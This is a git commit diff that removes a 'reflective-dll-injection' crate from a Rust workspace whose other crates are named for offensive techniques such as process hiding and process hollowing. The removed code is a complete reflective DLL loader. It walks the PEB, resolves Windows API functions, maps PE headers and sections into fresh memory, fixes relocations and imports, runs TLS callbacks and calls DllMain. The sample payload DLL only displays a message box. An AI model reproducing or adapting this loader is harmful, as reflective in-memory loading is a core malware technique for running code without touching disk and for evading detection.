remove reflective-dll-injection

This commit is contained in:
uru
2021-04-19 09:30:58 +09:00
parent 5e57285e6a
commit 125a437b2e
9 changed files with 0 additions and 204 deletions
-1
View File
@@ -14,7 +14,6 @@ members = [
"crate/payload-sample",
"crate/process-hide",
"crate/process-hollow",
"crate/reflective-dll-injection",
"crate/wuhu",
"crate/yura",
]
-18
View File
@@ -1,18 +0,0 @@
[package]
name = "reflective-dll-injection"
version = "0.1.0"
authors = ["uru <mail@nyaa.gg>"]
edition = "2018"
# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
[dependencies]
pe-tools = { path = "../pe-tools" }
winapi = { version = "0.3.9", features = ["winuser"] }
ntapi = { version = "0.3.6", features = ["nightly"] }
anyhow = "1.0.39"
pelite = "0.9.0"
[lib]
name = "dll64"
crate-type = ["cdylib"]
@@ -1,34 +0,0 @@
use crate::dll::loader64;
use winapi::shared::minwindef::{BOOL, DWORD, HINSTANCE, LPVOID};
#[no_mangle]
#[allow(non_snake_case)]
pub unsafe extern "system" fn DllMain(
_module: HINSTANCE,
call_reason: DWORD,
_reserved: LPVOID,
) -> BOOL {
match call_reason {
DLL_PROCESS_ATTACH => {
msg("hello", "test");
}
_ => {}
};
true as _
}
use std::ptr;
use winapi::um::winuser::{MessageBoxW, MB_OK};
fn e(source: &str) -> Vec<u16> {
source.encode_utf16().chain(Some(0)).collect()
}
fn msg(t: impl Into<String>, c: impl Into<String>) {
let t = t.into();
let c = c.into();
unsafe {
MessageBoxW(ptr::null_mut(), e(&c).as_ptr(), e(&t).as_ptr(), MB_OK);
}
}
@@ -1,125 +0,0 @@
#[allow(non_snake_case)]
#[allow(non_camel_case_types)]
extern crate pe_tools;
use std::ptr::null_mut;
use anyhow::*;
use ntapi::{ntpebteb::PEB, winapi_local::um::winnt::__readgsqword};
use pe_tools::shared::*;
use pe_tools::x64::*;
use winapi::{
shared::{
basetsd::SIZE_T,
minwindef::{BOOL, DWORD, HINSTANCE, LPVOID},
ntdef::{HANDLE, NTSTATUS, PVOID},
},
um::winnt::{
DLL_PROCESS_ATTACH, MEM_COMMIT, MEM_RESERVE, PAGE_EXECUTE_READWRITE, PAGE_READWRITE,
},
};
pub type PVirtualAlloc =
fn(lpAddress: LPVOID, dwSize: SIZE_T, flAllocationType: DWORD, flProtect: DWORD) -> LPVOID;
pub type PNtFlushInstructionCache =
fn(ProcessHandle: HANDLE, BaseAddress: PVOID, Length: SIZE_T) -> NTSTATUS;
pub type DllMain = unsafe extern "system" fn(HINSTANCE, DWORD, LPVOID) -> BOOL;
#[no_mangle]
pub extern "system" fn reflective_load() -> bool {
match __reflective_load() {
Ok(_) => true,
Err(_) => false,
}
}
pub fn __reflective_load() -> Result<()> {
unsafe {
// 1: get image base address of own, create pe container
let ppeb = __readgsqword(0x60) as *mut PEB;
let my_base_address = (*ppeb).ImageBaseAddress;
let mut container = PEContainer::new(my_base_address, true)?;
// 2: get address needed by the loading process
let pLoadLibraryA =
ptr_to_fn::<PLoadLibraryA>(search_proc_address_from_loaded_module("LoadLibraryA")?);
let pGetProcAddress =
ptr_to_fn::<PGetProcAddress>(search_proc_address_from_loaded_module("GetProcAddress")?);
let pVirtualAlloc =
ptr_to_fn::<PVirtualAlloc>(search_proc_address_from_loaded_module("VirtualAlloc")?);
let pNtFlushInstructionCache = ptr_to_fn::<PNtFlushInstructionCache>(
search_proc_address_from_loaded_module("NtFlushInstructionCache")?,
);
// 3: allocate new v memory, and change target base address to it
let mut allocated = pVirtualAlloc(
container.image_base_address(),
container.image_size() as _,
MEM_RESERVE | MEM_COMMIT,
PAGE_READWRITE,
);
if allocated as u64 == 0x0 as u64 {
allocated = pVirtualAlloc(
null_mut(),
container.image_size() as _,
MEM_RESERVE | MEM_COMMIT,
PAGE_READWRITE,
);
};
if allocated as u64 == 0x0 as u64 {
bail!(
"could not allocate of the remote process image. VirtualAlloc calling was failed."
)
};
// 4: copy over headers
container.copy_headers_to(allocated)?;
// 5: copy over section headers
container.copy_section_headers_to(allocated)?;
// 6: relocate it if needed.(this is need in almost case)
container.delta_relocation(allocated)?;
// 7: resolve import table
container.resolve_import(allocated, pLoadLibraryA, pGetProcAddress)?;
// TODO: 8: resolve delayed import?
// TODO: 9: call protect memory?
// 10: flush the instruction cache to avoid stale code being used
pNtFlushInstructionCache(-1 as _, null_mut(), 0);
// 11: execute tls callbacks
container.exec_tls_callback(allocated)?;
// TODO: 12: register exception handler?
// 13: call DllMain
let p_dll_main = allocated as u64 + container.pe.entry as u64;
let dll_main = ptr_to_fn::<DllMain>(p_dll_main as _);
dll_main(allocated as _, DLL_PROCESS_ATTACH, 1 as _);
Ok(())
}
}
// for debug
use std::ptr;
use winapi::um::winuser::{MessageBoxW, MB_OK};
fn e(source: &str) -> Vec<u16> {
source.encode_utf16().chain(Some(0)).collect()
}
fn debug(t: impl Into<String>, c: impl Into<String>) {
let t = t.into();
let c = c.into();
unsafe {
MessageBoxW(ptr::null_mut(), e(&c).as_ptr(), e(&t).as_ptr(), MB_OK);
}
}
@@ -1,2 +0,0 @@
pub mod dll64;
pub mod loader64;
@@ -1,4 +0,0 @@
extern crate pe_tools;
pub mod x64;
pub mod x86;
@@ -1,17 +0,0 @@
use std::ptr::null_mut;
use anyhow::*;
use pe_tools::{shared, x64};
use pelite::pe64::exports::GetProcAddress;
use winapi::ctypes::c_void;
pub fn get_loader_offset(dll_base_address: *mut c_void) -> Result<*mut c_void> {
let dll_container = x64::PEContainer::new(dll_base_address, true)?;
let loader = dll_container.search_expoted_func("reflective_load");
if loader.is_ok() {
Ok(loader.unwrap() as _)
} else {
bail!("could not find reflective_load function")
}
}
@@ -1 +0,0 @@
@@ -1,2 +0,0 @@
pub mod dll;
pub mod inject;